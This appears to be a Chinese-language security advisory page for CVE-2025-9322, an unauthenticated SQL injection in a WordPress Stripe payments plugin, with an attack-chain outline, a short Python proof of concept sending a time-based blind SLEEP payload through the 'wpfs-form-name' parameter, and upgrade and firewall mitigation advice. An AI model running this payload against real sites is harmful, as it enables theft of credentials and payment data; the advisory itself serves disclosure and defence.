CVE-2025-9322 CVSS 7.5 高危

CVE-2025-9322 WordPress WP Full Stripe插件SQL注入漏洞

披露日期: 2025-10-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-9322

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Stripe Payment Forms by WP Full Pay WordPress插件

漏洞概述

CVE-2025-9322是WordPress插件"Stripe Payment Forms by WP Full Pay"中的一个高危SQL注入漏洞。该插件用于在WordPress网站上接受Stripe支付、捐款和订阅。在8.3.1及之前的所有版本中，由于对用户提供的'wpfs-form-name'参数缺乏足够的转义处理，且现有的SQL查询缺乏足够的预处理机制，导致存在SQL注入漏洞。未经身份认证的攻击者可以利用此漏洞在现有查询后追加额外的SQL语句，从而访问和提取数据库中的敏感信息。此漏洞的CVSS评分为7.5，属于高危级别，攻击复杂度低，无需认证和用户交互即可实施攻击，对系统机密性造成严重影响。

技术细节

该SQL注入漏洞源于插件在处理'wpfs-form-name'HTTP参数时的输入验证不足。当用户提交包含恶意SQL代码的表单名称参数时，插件直接将用户输入拼接到SQL查询语句中，而未进行充分的转义或使用参数化查询。攻击者可以通过构造特殊的SQL payload，例如使用UNION SELECT、布尔盲注或时间盲注等技术，从数据库中提取敏感信息。漏洞存在于插件的文件处理逻辑中，具体涉及表单名称的数据库查询操作。由于SQL查询未使用预编译语句（Prepared Statements），攻击者可以突破原始查询的语义边界，执行任意SQL命令。攻击者可能获取的数据包括用户凭证、支付信息、WordPress配置数据以及其他插件数据库中的敏感内容。

攻击链分析

STEP 1

步骤1

攻击者识别运行WP Full Stripe插件（<=8.3.1版本）的WordPress站点

STEP 2

步骤2

攻击者向目标站点发送包含恶意SQL payload的HTTP请求，使用wpfs-form-name参数

STEP 3

步骤3

插件直接将用户输入拼接到SQL查询语句，未进行转义或参数化处理

STEP 4

步骤4

攻击者利用UNION注入或盲注技术提取数据库中的敏感信息

STEP 5

步骤5

攻击者获取用户凭证、支付数据或其他敏感数据库内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-9322 PoC - SQL Injection in WP Full Stripe Plugin
# Target: WordPress site with WP Full Stripe plugin <= 8.3.1
# Parameter: wpfs-form-name

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# Blind SQL Injection payload to extract database version
# Using time-based blind injection technique
payload_template = "' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '%'='"

# Construct the malicious request
params = {
    'wpfs-form-name': payload_template,
    'action': 'wp_full_stripe_payment_form'
}

print(f"[*] Sending exploit to {target_url}")
print(f"[*] Payload: {payload_template}")

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[+] Response status: {response.status_code}")
    if response.elapsed.total_seconds() >= 5:
        print("[+] Server is vulnerable! Time-based blind SQL injection confirmed.")
    else:
        print("[-] Server may not be vulnerable or target is not affected.")
except requests.exceptions.Timeout:
    print("[+] Server is vulnerable! Request timed out as expected.")
except Exception as e:
    print(f"[-] Error: {str(e)}")

影响范围

WP Full Stripe Free <= 8.3.1

WP Full Stripe (all versions up to 8.3.1)

防御指南

临时缓解措施

立即将WP Full Stripe插件升级到8.3.2或更高版本。如果暂时无法升级，可使用Web应用防火墙规则阻止包含SQL注入特征的请求（如单引号、UNION、SELECT等关键词），同时考虑暂时禁用该插件的相关功能直到完成安全更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表